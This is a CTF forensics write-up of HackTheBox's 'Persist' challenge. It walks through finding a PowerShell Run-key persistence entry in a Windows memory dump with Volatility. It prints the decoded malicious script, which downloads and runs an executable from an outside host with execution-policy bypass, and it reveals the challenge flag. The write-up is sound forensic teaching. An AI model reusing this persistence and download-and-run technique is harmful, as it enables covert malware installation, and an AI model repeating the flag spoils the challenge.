Persist

Event: Cyber Santa is Coming to Town – 2021 HackTheBox

Category: Forensics

PTS: 300

Description:

Although Santa just updated his infra, problems still occur. He keeps complaining about slow boot time and a blue window popping up for a split second during startup. The IT elves support suggested that he should restart his computer. Ah, classic IT support!


Inside the zip file there's a .raw file, the same kind of memory dump we saw previously in the honeypot challenge, so let's roll with the same modus operandi.

volatility -f ./persist.raw imageinfo
Volatility Foundation Volatility Framework 2.6
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win7SP1x86_23418, Win7SP0x86, Win7SP1x86
                     AS Layer1 : IA32PagedMemoryPae (Kernel AS)
                     AS Layer2 : FileAddressSpace (/home/grizzly/codice/hacking/ctf/cyber_santa_is_coming_htb/forensics_persist/persist.raw)
                      PAE type : PAE
                           DTB : 0x185000L
                          KDBG : 0x82977c68L
          Number of Processors : 1
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0x82978d00L
             KUSER_SHARED_DATA : 0xffdf0000L
           Image date and time : 2021-11-30 22:05:35 UTC+0000
     Image local date and time : 2021-11-30 14:05:35 -0800

We know that we're dealing with a memory dump of the OS and that we're looking for something that runs at boot, probably a PowerShell script (judging from the blue pop-up window). There are no default modules to help with that kind of search, but maybe the community has already faced this problem; let's check the internet.

http://tomchop.me/2014/09/18/volatility-autoruns/

They did. Using this simple plugin and following the instructions on that page, your command should look like this, or at least something similar:

volatility --plugins=volatility-autoruns/ --profile=Win7SP1x86_23418 -f ./persist.raw autoruns


As you can see, there is something launched through powershell.exe under the Run key of the ntuser.dat hive:

Hive: \??\C:\Users\Santa\ntuser.dat 
    Software\Microsoft\Windows\CurrentVersion\Run (Last modified: 2021-11-30 22:04:29 UTC+0000)
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -enc 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

It's obviously a base64-encoded script. Decoding it produces the following output; the dots between the characters are the null bytes of the UTF-16LE encoding that PowerShell's -enc switch expects:

$.P.a.t.h. .=. .'.C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.w.i.n.d.o.w.s.\.w.i.n...e.x.e.'.;.i.f. .(.-.N.O.T.(.T.e.s.t.-.P.a.t.h. .-.P.a.t.h. .$.P.a.t.h. .-.P.a.t.h.T.y.p.e. .L.e.a.f.).).{.S.t.a.r.t.-.P.r.o.c.e.s.s. .$.P.a.t.h.}.e.l.s.e.{.m.k.d.i.r. .'.C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.w.i.n.d.o.w.s.'.;.$.f.l.a.g. .=. .".H.T.B.{.T.h.3.s.3._.3.l.v.3.s._.4.r.3._.r.3.4.l.l.y._.m.4.l.1.c.1.0.u.s.}.".;.i.e.x. .(.N.e.w.-.O.b.j.e.c.t. .S.y.s.t.e.m...N.e.t...W.e.b.C.l.i.e.n.t.)...D.o.w.n.l.o.a.d.F.i.l.e.(.".h.t.t.p.s.:././.w.i.n.d.o.w.s.l.i.v.e.u.p.d.a.t.e.r...c.o.m./.w.i.n...e.x.e.".,.$.P.a.t.h.).;.S.t.a.r.t.-.P.r.o.c.e.s.s. .$.P.a.t.h.}.%.

Which cleaned out looks like this:

$Path = 'C:\ProgramData\windows\win.exe';if (-NOT(Test-Path -Path $Path -PathType Leaf)){Start-Process $Path}else{mkdir 'C:\ProgramData\windows';$flag = "HTB{Th3s3_3lv3s_4r3_r34lly_m4l1c10us}";iex (New-Object System.Net.WebClient).DownloadFile("https://windowsliveupdater.com/win.exe",$Path);Start-Process $Path}%
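The two steps above, decoding the -enc argument and cleaning up the dotted output, as an added Python example that is not part of the original writeup. The -enc switch takes base64 over the UTF-16LE bytes of the script, so decoding the bytes as UTF-16LE gives clean text directly; the dots in the naive rendering are the NUL bytes, and dropping every odd position recovers the script, which is what the manual cleanup did. The sample script, its path and its URL are constructed placeholders, and all function names are my own.

```python
import base64
import re

# Constructed sample in the shape of the Run-key script from the writeup; the
# path and URL are placeholders, not the challenge's values.
SAMPLE_SCRIPT = (
    "$Path = 'C:\\ProgramData\\example\\tool.exe';"
    "iex (New-Object System.Net.WebClient).DownloadFile("
    "\"https://example.invalid/tool.exe\",$Path);Start-Process $Path"
)


def encode_powershell_command(script: str) -> str:
    """Produce what `powershell.exe -enc` takes: base64 over the UTF-16LE bytes."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell_command(encoded: str) -> str:
    """Reverse -enc properly: base64-decode, then decode the bytes as UTF-16LE."""
    return base64.b64decode(encoded).decode("utf-16-le")


def render_as_dots(encoded: str) -> str:
    """Model of the 'dotted' output: one character per byte, NUL shown as '.'."""
    raw = base64.b64decode(encoded).decode("latin-1")
    return raw.replace("\x00", ".")


def undot(rendered: str) -> str:
    """Recover the script from the dotted rendering. For an ASCII script every
    odd position is a NUL shown as '.', so keeping the even positions restores
    the text (a real '.' in the script sits at an even position and survives)."""
    if not all(rendered[i] == "." for i in range(1, len(rendered), 2)):
        raise ValueError("not a dotted UTF-16LE rendering; decode as UTF-16LE instead")
    return rendered[::2]


def extract_indicators(script: str) -> dict:
    """Pull out what an analyst wants from a decoded script: URLs, Windows
    paths, and whether it fetches anything from the network."""
    return {
        "urls": re.findall(r"https?://[^\s\"'()]+", script),
        "paths": re.findall(r"[A-Za-z]:\\[^\s\"';]+", script),
        "downloads": bool(re.search(r"Download(File|String)", script)),
    }


def analyze_encoded_command(encoded: str) -> dict:
    """Decode an -enc argument and return the script together with its indicators."""
    script = decode_powershell_command(encoded)
    return {"script": script, **extract_indicators(script)}


if __name__ == "__main__":
    enc = encode_powershell_command(SAMPLE_SCRIPT)
    print("dotted  :", render_as_dots(enc)[:60], "...")
    print("undotted:", undot(render_as_dots(enc)) == SAMPLE_SCRIPT)
    for key, value in analyze_encoded_command(enc).items():
        print(f"{key:>9}: {value}")
```

Feed analyze_encoded_command the base64 blob taken from the Run value and you get the script plus the URL and drop path to pivot on in the rest of the image (or in proxy and DNS logs on a real case); undot is only the fallback for when all you have is a dotted dump from another tool.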

That gives us the flag in clear.
This was pretty smooth thanks to the time spent on the honeypot challenge; we came in strong from that.